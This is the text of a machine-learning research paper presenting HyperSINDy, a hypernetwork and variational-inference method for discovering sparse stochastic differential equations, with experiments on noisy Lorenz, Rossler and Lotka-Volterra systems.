the coefficients of a differential equation whose sparse form is learned simultaneously using a trainable binary mask \citep{louizos_learning_2018}. Once trained, HyperSINDy generates stochastic dynamics via a differential equation whose coefficients are driven by a Gaussian white noise. In experiments, HyperSINDy accurately recovers ground truth stochastic governing equations, with learned stochasticity scaling to match that of the data. Finally, HyperSINDy provides uncertainty quantification that scales to high-dimensional systems. Taken together, HyperSINDy offers a promising framework for model discovery and uncertainty quantification in real-world systems, integrating sparse equation discovery methods with advances in statistical machine learning and deep generative modeling.
Mozes Jacobs, Bingni W. Brunton, Steven L. Brunton, J. Nathan Kutz, Ryan V. Raut
2023-10-07T14:41:59Z
http://arxiv.org/abs/2310.04832v1
# HyperSINDy: Deep Generative Modeling of Nonlinear Stochastic Governing Equations ###### Abstract The discovery of governing differential equations from data is an open frontier in machine learning. The _sparse identification of nonlinear dynamics_ (SINDy) (Brunton et al., 2016) framework enables data-driven discovery of interpretable models in the form of sparse, deterministic governing laws. Recent works have sought to adapt this approach to the stochastic setting, though these adaptations are severely hampered by the curse of dimensionality. On the other hand, Bayesian-inspired deep learning methods have achieved widespread success in high-dimensional probabilistic modeling via computationally efficient approximate inference techniques, suggesting the use of these techniques for efficient stochastic equation discovery. Here, we introduce _HyperSINDy_, a framework for modeling stochastic dynamics via a deep generative model of sparse governing equations whose parametric form is discovered from data. HyperSINDy employs a variational encoder to approximate the distribution of observed states and derivatives. A hypernetwork (Ha et al., 2016) transforms samples from this distribution into the coefficients of a differential equation whose sparse form is learned simultaneously using a trainable binary mask (Louizos et al., 2018). Once trained, HyperSINDy generates stochastic dynamics via a differential equation whose coefficients are driven by a Gaussian white noise. In experiments, HyperSINDy accurately recovers ground truth stochastic governing equations, with learned stochasticity scaling to match that of the data. Finally, HyperSINDy provides uncertainty quantification that scales to high-dimensional systems. Taken together, HyperSINDy offers a promising framework for model discovery and uncertainty quantification in real-world systems, integrating sparse equation discovery methods with advances in statistical machine learning and deep generative modeling. ## 1 Introduction Across numerous disciplines, large amounts of measurement data have been collected from dynamical phenomena lacking comprehensive mathematical descriptions. It is desirable to model these data in terms of governing equations involving the state variables, which typically enables insight into the physical interactions in the system. To this end, recent years have seen considerable progress in the ability to distill such governing equations from data alone (e.g., (Schmidt and Lipson, 2009; Brunton et al., 2016)). Nonetheless, this remains an outstanding challenge for systems exhibiting apparently stochastic nonlinear behavior, particularly when lacking even partial knowledge of the governing equations. Such systems thus motivate probabilistic approaches that not only reproduce the observed stochastic behavior (e.g., via generic stochastic differential equations (SDEs) (Friedrich et al., 2011) or neural networks (Girin et al., 2021; Lim and Zohren, 2021)), but do so via discovered analytical representations that are parsimonious and physically informative (Boninsegna et al., 2018). We are particularly interested in model-free methods that seek to discover both the parameters and functional form of governing equations describing the data. To this end, the sparse identification of nonlinear dynamics (SINDy) framework (Brunton et al., 2016) has emerged as a powerful data-driven approach that identifies both the coefficients and terms of differential equations, given a pre-defined library of candidate functions.
The effectiveness of SINDy for sparse model discovery derives from the tendency of physical systems to possess a relatively limited set of active terms. Extensions of the SINDy framework have sought to increase its robustness to noise, offer uncertainty quantification (UQ), and make it suitable for modeling stochastic dynamics (Boninsegna et al., 2018; Niven et al., 2020; Messenger and Bortz, 2021; Hirsh et al., 2021; Callaham et al., 2021; Fasel et al., 2022; Wang et al., 2022). However, these extensions have generally relied upon computationally expensive approaches to learn the appropriate probability distributions. As such, a unified and computationally tractable formulation of SINDy that meets these additional goals is presently lacking. Variational inference (VI) methods represent a class of techniques for addressing the complex and often intractable integrals arising in exact Bayesian inference, instead approximating the true posterior via simple distribution(s). Recently, the combination of _amortized_ VI (Ganguly et al., 2022) with the representational capacity of neural networks has emerged as a powerful, efficient approach to probabilistic modeling, with widespread application in the form of deep generative models (Kingma and Welling, 2014; Rezende and Mohamed, 2015). Despite the success of these approaches for dynamical modeling (e.g., (Girin et al., 2021)), applications thus far have utilized generic state space formulations or parameter inference on a known functional form of the dynamics. Thus, the potential for VI to facilitate probabilistic equation discovery remains largely unexplored. ### Contributions In this work, we propose HyperSINDy, a VI-based SINDy implementation that learns a parameterized distribution of ordinary differential equations (ODEs) sharing a common sparse form. Specifically, HyperSINDy employs a variational encoder to parameterize a latent distribution over observed states and derivatives, then uses a hypernetwork (Ha et al., 2016; Pawlowski et al., 2018) to translate samples from this distribution into the coefficients of a sparse ODE whose functional form is learned in a common optimization. In this way, HyperSINDy is able to model complex stochastic dynamics through an interpretable analytical expression - technically, a _random_ ODE (Han and Kloeden, 2017) - whose coefficients are parameterized by a white noise process. Specific contributions of the HyperSINDy framework include: * **Efficient and Accurate Modeling of Stochastic Dynamics at Scale.** Through VI, we circumvent the curse of dimensionality that hampers other methods in identifying sparse stochastic equations. Specifically, HyperSINDy can accurately discover governing equations for stochastic systems having well beyond two spatial dimensions, which existing approaches have not exceeded (Boninsegna et al., 2018; Callaham et al., 2021; Wang et al., 2022; Huang et al., 2022; Tripura and Chakraborty, 2023). Importantly, HyperSINDy's generative model is able to learn a complex distribution over the coefficients, and variance proportionately scales to match that of the data. * **Generative Modeling of Dynamics.** Once trained, HyperSINDy generates a random dynamical system whose vector field is parameterized by a Gaussian white noise. Hence, our approach efficiently arrives at a generative model for both the system dynamics and the exogenous disturbances (representing, e.g., unresolved scales). 
This permits simulations that reproduce the stochastic dynamical behavior of the observed process, while providing a natural method for quantifying uncertainty of the model parameters and propagating uncertainty in the probabilistic model forecast. * **Interpretable Governing Equations Discovery.** In contrast to other deep generative approaches for modeling stochastic dynamics, HyperSINDy discovers the analytical form of a sparse governing equation without a priori knowledge. Sparsity promotes human readable models where each term corresponds to an interpretable physical mechanism. This notion of interpretability, based on sparsity, is appealing in the traditional perspective of engineering and physics. In section 1.2, we discuss relevant literature. In section 2, we provide a background on the specific methods and mathematics that inspired our method. In section 3, we describe HyperSINDy. In section 4, we show results on various experiments. In section 5, we conclude with a discussion of our method, its limitations, and possible future directions. Figure 1: **HyperSINDy Framework.** HyperSINDy employs an inference model and generative model to discover an analytical representation of observed stochastic dynamics in the form of a random (nonlinear) ODE \(f_{\mathbf{z}}(\mathbf{x})\). The inference model is an encoder neural network that maps \((\mathbf{x},\dot{\mathbf{x}})\) to the parameters \(\mu\) and \(\sigma\) of \(q_{\phi}(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})\). \(\mathbf{z}\) can be sampled using a simple reparameterization of \(\mu\) and \(\sigma\). The generative model predicts the derivative via a hypernetwork \(H\), which transforms \(\mathbf{z}\) into \(\Xi_{\mathbf{z}}\), the coefficients of the ODE. \(f_{\mathbf{z}}(\mathbf{x})\) comprises a function library \(\Theta\), the coefficients \(\Xi_{\mathbf{z}}\), and sparse mask \(M\). If \(\dot{\mathbf{x}}\) is not available (e.g., after training), \(\mathbf{z}\) is sampled from the prior \(\mathbf{z}\sim p_{\theta}(\mathbf{z})\) to produce \(\Xi_{\mathbf{z}}\). In the legend, trainable parameters are shown in green. The loss function comprises terms related to 1) the derivative reconstructions, 2) the latent distribution \(q_{\phi}(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})\), and 3) sparsity of the discovered equation. See accompanying pseudocode 1 and 2 for details on batch-wise training. ### Related Work HyperSINDy bridges two parallel lines of work concerning data-driven modeling for stochastic dynamics: namely, probabilistic sparse equation discovery and deep generative modeling. Most probabilistic implementations of SINDy have concerned UQ and noise robustness in the deterministic setting, rather than modeling stochastic dynamics per se. Of these approaches, ensembling methods (Fasel et al., 2022) have achieved state-of-the-art UQ and noise robustness for deterministic SINDy models, and were recently shown (Gao et al., 2023) to offer a computationally efficient alternative to earlier Bayesian implementations of SINDy (Niven et al., 2020; Hirsh et al., 2021) leveraging costly sampling routines to compute posterior distributions. Nonetheless, a model of the process noise is crucial for accurate UQ in the stochastic dynamics setting. Multiple studies have generalized the SINDy framework for the identification of parametric SDEs (Boninsegna et al., 2018; Callaham et al., 2021), with three such studies recently performed in the Bayesian setting (Wang et al., 2022; Huang et al., 2022; Tripura and Chakraborty, 2023).
However, as discussed in these works, existing methods for approximating the drift and diffusion terms of the SDE (e.g., constructing histograms for the Kramers-Moyal expansion) are severely hampered by the curse of dimensionality, with computational cost generally scaling exponentially with SDE state dimension. Thus, an efficient and scalable formulation of SINDy for stochastic dynamics remains lacking. A separate line of work has leveraged advances in probabilistic deep learning for modeling stochastic dynamics, with deep generative models achieving state-of-the-art performance across a wide range of modeling tasks (e.g., (Yoon et al., 2019; Girin et al., 2021)). Although these models do not typically involve explicit dynamical representations, the new paradigm of physics-informed machine learning (Karniadakis et al., 2021) has motivated numerous developments at this intersection (e.g., (Lopez and Atzberger, 2021; Takeishi and Kalousis, 2021; Yang et al., 2020; Zhang et al., 2019)). Regarding the specific goal of (stochastic) equation discovery, several recent works have successfully employed VAEs to learn the coefficients of a generic (or pre-specified) SDE representation within a (potentially lower-dimensional) latent space (Hasan et al., 2022; Garcia et al., 2022; Nguyen et al., 2021; Zhong and Meidani, 2023). We propose to similarly leverage a VAE-like architecture to perform inference on a latent stochastic process; however, we seek to additionally discover a structural representation of the governing laws, which can yield considerable physical insight into the system (Boninsegna et al., 2018; Nayek et al., 2021; Wang et al., 2022). Taken together, we seek to bridge the above fields via a unified deep learning architecture (trainable end-to-end with backpropagation) that enables discovery of the functional form of a governing stochastic process, along with posterior distributions over the discovered system coefficients (e.g., for UQ). ## 2 Background We briefly overview the SINDy and VAE frameworks, as well as an implementation of an \(L_{0}\) loss, before describing their integration within the HyperSINDy architecture. **Sparse Identification of Nonlinear Dynamics.** The SINDy (Brunton et al., 2016) framework leverages sparse regression to enable discovery of a parsimonious system of differential equations from time-ordered snapshots. Thus, consider a system with state \(\mathbf{x}(t)\in\mathbb{R}^{d}\) governed by the ODE: \[\mathbf{\dot{x}}(t)=f(\mathbf{x}(t)) \tag{1}\] Given \(m\) observations of the system in time \(\mathbf{X}=[\mathbf{x}(t_{1}),\mathbf{x}(t_{2}),...,\mathbf{x}(t_{m})]^{T}\) and the estimated time derivatives \(\mathbf{\dot{X}}=[\mathbf{\dot{x}}(t_{1}),\mathbf{\dot{x}}(t_{2}),...,\mathbf{\dot{x}}(t_{m})]^{T}\), we construct a library of candidate functions \(\Theta(\mathbf{X})=[\theta_{1}(\mathbf{X}),\theta_{2}(\mathbf{X}),...,\theta_{t}(\mathbf{X})]\). We then solve the regression problem, \(\mathbf{\dot{X}}=\Theta(\mathbf{X})\mathbf{\Xi}\), to identify the optimal functions and coefficients in \(\Theta\) and \(\mathbf{\Xi}\), respectively. A sparsity-promoting regularization function \(R\) is typically added to this model discovery problem, yielding the final optimization, \(\hat{\mathbf{\Xi}}=\arg\min_{\mathbf{\Xi}}(\mathbf{\dot{X}}-\Theta(\mathbf{X})\mathbf{\Xi})^{2}+R(\mathbf{\Xi})\). 
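To make the regression above concrete, the following is a minimal sketch of the basic SINDy procedure using a polynomial library and sequentially thresholded least squares; the library, threshold, and toy data are illustrative assumptions rather than the settings used in this paper.

```python
import numpy as np

def poly_library(X):
    """Theta(X): constant, linear, and quadratic candidate terms."""
    n, d = X.shape
    cols = [np.ones((n, 1)), X]
    for i in range(d):
        for j in range(i, d):
            cols.append((X[:, i] * X[:, j]).reshape(-1, 1))
    return np.hstack(cols)

def stlsq(Theta, Xdot, threshold=0.1, n_iter=10):
    """Sequentially thresholded least squares for Xdot ~ Theta @ Xi."""
    Xi = np.linalg.lstsq(Theta, Xdot, rcond=None)[0]
    for _ in range(n_iter):
        small = np.abs(Xi) < threshold            # prune terms below the threshold
        Xi[small] = 0.0
        for k in range(Xdot.shape[1]):            # refit surviving terms per state dimension
            big = ~small[:, k]
            if big.any():
                Xi[big, k] = np.linalg.lstsq(Theta[:, big], Xdot[:, k], rcond=None)[0]
    return Xi

# Toy example: recover dx/dt = -2x from noisy snapshots
t = np.linspace(0.0, 5.0, 500)
X = np.exp(-2.0 * t).reshape(-1, 1)
Xdot = -2.0 * X + 1e-3 * np.random.randn(*X.shape)
Xi = stlsq(poly_library(X), Xdot, threshold=0.05)
print(Xi.ravel())   # coefficient on the linear term should be close to -2
```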
Although we focus on this basic implementation, we note that there have been numerous extensions of the original SINDy framework (for a recent overview, see (Kaptanoglu et al., 2022)), many of which can be easily incorporated into the present framework. **Variational Autoencoder.** The VAE framework (Kingma and Welling, 2014) elegantly integrates variational inference (VI) with deep learning architectures, providing an efficient and powerful approach toward probabilistic modeling. VAEs assume that a set of observations \(\mathbf{x}\) derives from a corresponding set of latent states \(\mathbf{z}\). VAEs construct an approximate posterior distribution \(q_{\phi}(\mathbf{z}|\mathbf{x})\) and maximize the evidence lower bound (ELBO) of the log likelihood of the data \(p_{\theta}(\mathbf{x})\): \[\log p_{\theta}(\mathbf{x})\geq ELBO(\mathbf{x},\mathbf{z})=\mathbb{E}_{q_{\phi}(\mathbf{z}|\mathbf{x})}[\log p_{\theta}(\mathbf{x}|\mathbf{z})]-D_{KL}(q_{\phi}(\mathbf{z}|\mathbf{x})||p_{\theta}(\mathbf{z})) \tag{2}\] where \(\phi\) and \(\theta\) are the parameters of the inference (encoder) and generative (decoder) models, respectively. The "reparameterization trick" enables sampling from \(q_{\phi}(\mathbf{z}|\mathbf{x})\) using \(\mathbf{z}=\mu(\mathbf{x})+\sigma(\mathbf{x})\odot\epsilon\) while still training the network end-to-end with backpropagation. After training, new observations are easily generated by sampling from the prior \(p_{\theta}(\mathbf{z})\), typically a unit Gaussian with diagonal covariance. **\(L_{0}\) Regularization.** The \(L_{0}\) norm is ideal for sparse regression problems as it penalizes all nonzero weights equally, regardless of magnitude. As \(L_{0}\) regularization poses an intractable optimization problem, the \(L_{1}\) regularization (lasso) - which penalizes the actual values of the learned weights - is a more common technique to achieve sparsity in practice. Nonetheless, incorporation of an \(L_{0}\)-norm penalty (Zheng et al., 2019) into SINDy was recently found to have considerable advantages (Champion et al., 2020), motivating us to adopt a backpropagation-compatible \(L_{0}\) regularization. Accordingly, we implement one such method recently proposed by Louizos et al. (2018), which penalizes a trainable mask using the hard-concrete distribution. Specifically, let \(M\in\mathbb{R}^{d}\) be the desired sparse mask. Let \(s\) be a binary concrete random variable (Maddison et al., 2017; Jang et al., 2017) distributed in \((0,1)\) with probability density \(q_{\phi}(s)\), cumulative density \(Q_{\phi}(s)\), location \(\log\alpha\), and temperature \(\beta\). Let \(\phi=(\log\alpha,\beta)\). Suppose we have \(\gamma<0\) and \(\zeta>1\). We define each element \(m\) in \(M\) as a hard concrete random variable computed entirely as a transformation of \(s\). Thus, learning an optimal \(m\) necessitates learning \(q_{\phi}(s)\), which simplifies to optimizing \(\log\alpha\) (we fix \(\beta\)). Sampling from \(q_{\phi}(s)\) and backpropagating into \(\log\alpha\) motivates use of the reparameterization trick (as in the VAE above) with \(\epsilon\sim\mathcal{U}(0,1)\). Then, \(m\) is computed. 
\[s=\text{Sigmoid}((\log\epsilon-\log(1-\epsilon)+\log\alpha)/\beta)\qquad\qquad m=\min(1,\max(0,s(\zeta-\gamma)+\gamma)) \tag{3}\] After training, we obtain \(m\) using our optimized \(\log\alpha\) parameter: \[m=\min(1,\max(0,\text{Sigmoid}(\log\alpha)(\zeta-\gamma)+\gamma)) \tag{4}\] We train \(M\) using the following loss: \[L_{0}(M)=\sum_{j=1}^{d}\text{Sigmoid}(\log\alpha_{j}-\beta\log\frac{-\gamma}{\zeta}) \tag{5}\] Refer to (Louizos et al., 2018) for the full derivation. In short, this provides a backpropagation-compatible approach to enforce sparsity via a trainable, element-wise mask. ## 3 HyperSINDy We combine advances in Bayesian deep learning with the SINDy framework to propose HyperSINDy, a hypernetwork (Ha et al., 2016; Pawlowski et al., 2018) approach to parsimoniously model stochastic nonlinear dynamics via a noise-parameterized vector field whose sparse, time-invariant functional form is discovered from data. In brief, HyperSINDy uses a variational encoder to learn a latent distribution over the states and derivatives of a system, whose posterior is regularized to match a Gaussian prior. Once trained, a white noise process generates a time-varying vector field by updating the coefficients of the discovered (random) ODE. Across a range of experiments, new noise realizations generate stochastic nonlinear dynamics that recapitulate the behavior of the original system, while also enabling UQ on the learned coefficients. Fig. 1 provides an overview of our approach and problem setting, which we detail below. **Problem Setting.** Stochastic equations are fundamental tools for mathematically modeling dynamics under uncertainty. In general, the precise physical source of uncertainty is unknown and/or of secondary importance (Friedrich et al., 2011; Duan, 2015; Sarkka and Solin, 2019); as such, several formulations exist. A common choice is the Langevin-type SDE with explicitly separated deterministic (drift) and stochastic (diffusion) terms. Alternatively, we may consider a deterministic ODE with stochastic parameters, i.e., a _random_ ODE (RDE), which is another well-established framework (Arnold, 1998; Duan, 2015) with wide-ranging real-world applications (e.g., fluctuating resources in biological systems (Kloeden and Potzsche, 2013; Caraballo and Han, 2016)). Here, we adopt the RDE formulation in the widely studied setting of i.i.d. noise (Arnold, 1998; Caraballo and Han, 2016). We find this formulation practically advantageous for integration with deep generative modeling and VI, enabling a powerful and scalable approach to stochastic dynamics. Importantly, since any (finite-dimensional) SDE can be transformed into an equivalent RDE and vice versa (Han and Kloeden, 2017), these practical advantages can be exploited without compromising relevance to canonical SDE representations (as we will empirically demonstrate). As above, let \(\mathbf{x}_{0:T}\) be the observations from times \(0\) to \(T\) of the state of a system, \(\mathbf{x}_{t}\in\mathbb{R}^{n}\). We assume these data are generated from some stochastic dynamics \(\dot{\mathbf{x}}=f_{\mathbf{z}}(\mathbf{x}_{t})\), where \(\mathbf{z}\) is a latent random variable modeled as an i.i.d. noise process. We wish to identify a family of sparse vector field functions \(f_{\mathbf{z}}\) constrained to a common functional form for all \(\mathbf{z}\in\mathbb{R}^{d}\) (i.e., only the coefficients of \(f\) are time-varying, reflecting the system's dependence on fluctuating quantities). 
With this framing, we seek to approximate both the functional form \(f_{\mathbf{z}}\) and a posterior estimate of the latent noise trajectory \(\mathbf{z}=[\mathbf{z}_{0},\mathbf{z}_{1},...,\mathbf{z}_{T}]^{T}\) associated with each observed trajectory \(\mathbf{x}_{0:T}\). To do so, we employ a variational encoder to learn an inference model for the latent space \(p(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})\) and a generative model \(p(\dot{\mathbf{x}}|\mathbf{x},\mathbf{z})\) subject to \(\dot{\mathbf{x}}=f_{\mathbf{z}}(\mathbf{x})\), as detailed below. Ultimately, once trained, we may generate new trajectories of \(\mathbf{x}\) simply by iteratively sampling \(\mathbf{z}\) from its Gaussian prior (i.e., constructing new sample paths of the driving noise). **Generative Model.** Consider the following factorization of the conditional generative model with parameters \(\theta\): \[p_{\theta}(\dot{\mathbf{x}},\mathbf{z}|\mathbf{x})=p_{\theta}(\dot{\mathbf{x}}|\mathbf{z},\mathbf{x})p_{\theta}(\mathbf{z}) \tag{6}\] We assume that \(\mathbf{z}\) is independent of \(\mathbf{x}\), so \(p_{\theta}(\mathbf{z}|\mathbf{x})=p_{\theta}(\mathbf{z})\). \(p_{\theta}(\dot{\mathbf{x}}|\mathbf{z},\mathbf{x})\) describes how the state \(\mathbf{x}\) and latent \(\mathbf{z}\) are transformed into the derivative, while \(p_{\theta}(\mathbf{z})\) is a prior over the latent distribution of states and their derivatives. We choose \(p_{\theta}(\mathbf{z})\) to be a standard Gaussian with diagonal covariance: \(p_{\theta}(\mathbf{z})=\mathcal{N}(0,\mathbf{I})\). There are numerous ways to implement \(f_{\mathbf{z}}(\mathbf{x})\), which parameterizes \(p_{\theta}(\dot{\mathbf{x}}|\mathbf{z},\mathbf{x})\). Following the SINDy framework, which seeks interpretable models in the form of sparse governing equations, we adapt Eq. 1 to arrive at the following implementation for \(f_{\mathbf{z}}(\mathbf{x})\): \[f_{\mathbf{z}}(\mathbf{x})=\Theta(\mathbf{x})(\Xi_{\mathbf{z}}\odot M). \tag{7}\] where \(\odot\) indicates an element-wise multiplication. \(\Theta(\mathbf{x})\) is a matrix expansion of \(\mathbf{x}\) using a pre-defined library of basis functions, which can include any rational functions, such as polynomial (e.g., \(\mathbf{x}_{1}^{2},\mathbf{x}_{1}\mathbf{x}_{2}\)) or trigonometric (e.g., \(\sin\mathbf{x}_{1},\tanh\mathbf{x}_{3}\)) functions. \(\Xi_{\mathbf{z}}\) is a matrix of coefficients that is output by a hypernetwork \(H\) that takes in \(\mathbf{z}\) as input: \(\Xi_{\mathbf{z}}=H(\mathbf{z})\). \(M\) is a matrix of values \(M_{ij}\in[0,1]\) that is trained with a close approximation to a differentiable \(L_{0}\) norm. Specifically, the values of \(M\) are simulated using a hard concrete distribution. As such, \(M\) enforces sparsity in the terms of each equation through the element-wise multiplication \((\Xi_{\mathbf{z}}\odot M)\). Refer to the Background section for more details on \(M\). We constrain \(f_{\mathbf{z}}\) to a \(d\)-parameter family of ODEs sharing a common functional form. Specifically, \(H\) implements an implicit distribution \(p_{\theta}(\mathbf{\Xi}|\mathbf{z})\) with \(\mathbf{z}\in\mathbb{R}^{d}\). Although we cannot compute the density of \(p_{\theta}(\mathbf{\Xi}|\mathbf{z})\) exactly, we can generate an ensemble of possible derivative functions by feeding samples \(\mathbf{z}\sim p_{\theta}(\mathbf{z})\) into the hypernetwork: \(\Xi_{\mathbf{z}}=H(\mathbf{z})\). 
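A minimal PyTorch-style sketch of this generative path (Eq. 7) is given below; the layer sizes, the two-dimensional polynomial library, the use of a fixed binary mask in place of the trained hard-concrete mask, and all names are illustrative assumptions rather than the authors' implementation.

```python
import torch
import torch.nn as nn

class Hypernetwork(nn.Module):
    """Maps a latent sample z to the coefficient matrix Xi_z."""
    def __init__(self, z_dim, n_terms, state_dim, hidden=64):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(z_dim, hidden), nn.ELU(),
            nn.Linear(hidden, hidden), nn.ELU(),
            nn.Linear(hidden, n_terms * state_dim),
        )
        self.n_terms, self.state_dim = n_terms, state_dim

    def forward(self, z):
        return self.net(z).view(-1, self.n_terms, self.state_dim)

def library(x):
    """Theta(x): [1, x1, x2, x1^2, x1*x2, x2^2] for a 2D state (illustrative)."""
    x1, x2 = x[:, :1], x[:, 1:2]
    return torch.cat([torch.ones_like(x1), x1, x2, x1**2, x1 * x2, x2**2], dim=1)

def f_z(x, z, hyper, mask):
    """x_dot = Theta(x) (Xi_z ⊙ M), as in Eq. 7."""
    Xi = hyper(z) * mask                           # mask stands in for the learned L0 mask M
    return torch.bmm(library(x).unsqueeze(1), Xi).squeeze(1)

# After training, sampling z ~ N(0, I) generates one realization of the random ODE
state_dim, n_terms, z_dim = 2, 6, 4
hyper = Hypernetwork(z_dim, n_terms, state_dim)
mask = torch.ones(n_terms, state_dim)              # placeholder binary mask
x = torch.randn(8, state_dim)                      # batch of states
z = torch.randn(8, z_dim)                          # one noise sample per state/time step
x_dot = f_z(x, z, hyper, mask)                     # predicted derivatives, shape (8, 2)
```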
**Inference Model.** Our inference model is defined by the approximate posterior, \(q_{\phi}(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})\), with parameters \(\phi\). \(q_{\phi}(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})\) is implemented by a neural network \(E\) and the reparameterization trick, i.e., \(\mu_{q},\sigma_{q}=E(\mathbf{x},\dot{\mathbf{x}})\); \(\hat{\mathbf{z}}=\mu_{q}+\epsilon\odot\sigma_{q}\). **Training.** We train the model end-to-end with backpropagation to minimize the following loss function: \[loss=(\dot{\mathbf{x}}-f_{\mathbf{z}}(\mathbf{x}))^{2}+\beta D_{KL}(q_{\phi}(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})||p_{\theta}(\mathbf{z}))+\lambda L_{0}(M) \tag{8}\] where \(\beta\) and \(\lambda\) are hyperparameters. The loss function optimizes the parameters \(\phi\) and \(\theta\), where \(\phi\) are the parameters of \(E\) (i.e., the variational parameters) and \(\theta\) are the parameters of \(H\) and \(M\) (note that \(p_{\theta}(\mathbf{z})\) has fixed parameters). Refer to the Appendix for a full derivation of this loss function, and to Background for details on the sparsity-related loss \(L_{0}(M)\) (especially equation 5). To speed up training, every set number of epochs, we permanently set values of \(M\) equal to 0 if the magnitude of the corresponding coefficients falls below a specific threshold value. ## 4 Results We evaluate the performance of HyperSINDy on four stochastic dynamical systems. Across a range of (dynamical) noise levels, we seek to assess the accuracy of models identified by HyperSINDy and the degree to which uncertainty estimates faithfully reflect the level of simulated noise. Refer to the Appendix for full details on data generation, training, and simulations. ### Stochastic Equation Discovery First, we show results for 3D Stochastic Lorenz and 3D Stochastic Rossler datasets, simulated by: \[\dot{x} =\omega(y-x) \dot{y} =x(\rho-z)-y \dot{z} =xy-\beta z \text{Lorenz} \tag{9}\] \[\dot{x} =-y-z \dot{y} =x+ay \dot{z} =b+z(x-c) \text{Rossler} \tag{10}\] where \((\omega,\rho,\beta)\) and \((a,b,c)\) are iteratively sampled (at each timestep) from normal distributions with scale \(\sigma\) and mean \((10,28,\frac{8}{3})\) and \((0.2,0.2,5.7)\), respectively. We train a HyperSINDy model on three trajectories from each system, with \(\sigma=1,5,10\). Refer to figure 2 for the full results. HyperSINDy correctly identifies most terms in each equation. Notably, increasing noise has little impact on the mean coefficients learned by HyperSINDy; instead, the estimated standard deviations of these coefficients proportionately scale with the dynamical noise. Furthermore, HyperSINDy correctly identifies which dynamical terms contain more noise and only increases the standard deviation of those terms, while maintaining tight bounds on other terms (i.e., \(xy\) in \(\dot{y}\) for Lorenz). Moreover, HyperSINDy is able to simulate the original (stochastic) dynamical behavior even as the noise level increases (blue trajectories). On the other hand, because HyperSINDy also successfully identifies the deterministic functional form despite process noise, it is able to produce smooth trajectories (purple) by forecasting with the mean of the discovered equation ensemble. Moreover, we ran separate experiments generating 10 trajectories (each with a different random seed, and each generated from a different initial condition) for each noise level of both systems. 
In total, we trained one HyperSINDy model and one E-SINDy model on each trajectory, yielding 30 HyperSINDy models and 30 E-SINDy models. We evaluated the RMSE of the mean and standard deviation of the discovered equations, as compared to ground truth. Refer to Table 1 for the full results. HyperSINDy outperforms E-SINDy on both mean and standard deviation for each experiment. ### Recovering drift-diffusion dynamics The preceding analyses validate HyperSINDy's capacity for stochastic equation discovery. As HyperSINDy adopts an RDE modeling strategy (i.e., a noise-parameterized ODE (Arnold, 1998; Han and Kloeden, 2017), rather than an SDE with separable drift and diffusion), validation was demonstrated on RDE-simulated data to enable straightforward comparison with ground truth. Crucially, RDEs are conjugate to SDEs (Han and Kloeden, 2017), so this distinction is not fundamental. Nonetheless, this raises the question of how HyperSINDy learns to represent SDE-simulated dynamics. \begin{table} \begin{tabular}{l l l l l l} \hline \hline & & \multicolumn{2}{c}{Lorenz} & \multicolumn{2}{c}{Rossler} \\ \cline{3-6} Param & & HyperSINDy & E-SINDy & HyperSINDy & E-SINDy \\ \hline 1 & MEAN & **0.082**\(\pm\) 0.004 & 0.18 \(\pm\) 0.029 & **0.029**\(\pm\) 0.035 & 0.077 \(\pm\) 0.04 \\ & STD & **0.598**\(\pm\) 0.045 & 1.296 \(\pm\) 0.083 & **0.828**\(\pm\) 0.059 & 0.849 \(\pm\) 0.012 \\ 5 & MEAN & **0.117**\(\pm\) 0.022 & 0.268 \(\pm\) 0.064 & **0.086**\(\pm\) 0.047 & 0.296 \(\pm\) 0.199 \\ & STD & **0.4**\(\pm\) 0.055 & 0.971 \(\pm\) 0.024 & **0.807**\(\pm\) 0.012 & 0.875 \(\pm\) 0.023 \\ 10 & MEAN & **0.203**\(\pm\) 0.047 & 0.349 \(\pm\) 0.103 & **0.228**\(\pm\) 0.138 & 0.699 \(\pm\) 0.551 \\ & STD & **0.279**\(\pm\) 0.085 & 0.913 \(\pm\) 0.016 & **0.812**\(\pm\) 0.014 & 0.875 \(\pm\) 0.028 \\ \hline \hline \end{tabular} \end{table} Table 1: Total coefficient RMSE relative to ground truth equations Figure 2: **3D Stochastic Lorenz and Rossler**. HyperSINDy models trained on trajectories of varying noise (\(\sigma\)). The mean and standard deviation of the discovered governing equation coefficients are shown. Refer to 9 and 10 for the ground truth equations. Red trajectories indicate sample test trajectories simulated with the given \(\sigma\). Purple trajectories are generated from HyperSINDy using the mean of the discovered governing equations, while blue trajectories are generated by iteratively sampling from HyperSINDy’s learned generative model. The test and HyperSINDy trajectories are generated from the same initial condition. To address this question, we simulate a 2D SDE to enable direct comparison against the leading method, stochastic SINDy (Boninsegna et al., 2018), as implemented in Python (Nabeel et al., 2022) (which cannot easily scale to higher dimensions). Specifically, we simulate a widely used model for population dynamics, the stochastic Lotka-Volterra system with state-dependent diffusion: \[\dot{x}=x-xy+\sigma_{x}(x,y)\mathcal{N}(0,1) \dot{y}=-y+xy+\sigma_{y}(x,y)\mathcal{N}(0,1) \tag{11}\] where we have: \[\sigma_{x}(x,y)=0.25x-0.09y \sigma_{y}(x,y)=-0.09x+0.25y\] Figure 3 illustrates the results of this analysis. Notably, HyperSINDy learns an expression whose terms correspond to those of the original drift function, thus enabling physical insight into the system. 
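As a point of reference for this comparison, ground-truth trajectories of Eq. 11 can be generated with a standard Euler-Maruyama scheme; the sketch below is illustrative only (the step size matches the \(\Delta t=0.01\) noted in Fig. 3, while the horizon, initial condition, and seed are assumptions).

```python
import numpy as np

def simulate_lotka_volterra(x0=1.0, y0=1.0, dt=0.01, n_steps=20000, seed=0):
    """Euler-Maruyama integration of the stochastic Lotka-Volterra system, Eq. 11."""
    rng = np.random.default_rng(seed)
    traj = np.empty((n_steps, 2))
    x, y = x0, y0
    for k in range(n_steps):
        fx = x - x * y                         # drift terms of Eq. 11
        fy = -y + x * y
        sig_x = 0.25 * x - 0.09 * y            # state-dependent diffusion coefficients
        sig_y = -0.09 * x + 0.25 * y
        dWx, dWy = rng.normal(0.0, np.sqrt(dt), size=2)
        x, y = x + fx * dt + sig_x * dWx, y + fy * dt + sig_y * dWy
        traj[k] = (x, y)
    return traj

traj = simulate_lotka_volterra()               # one sample path of the ground-truth SDE
```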
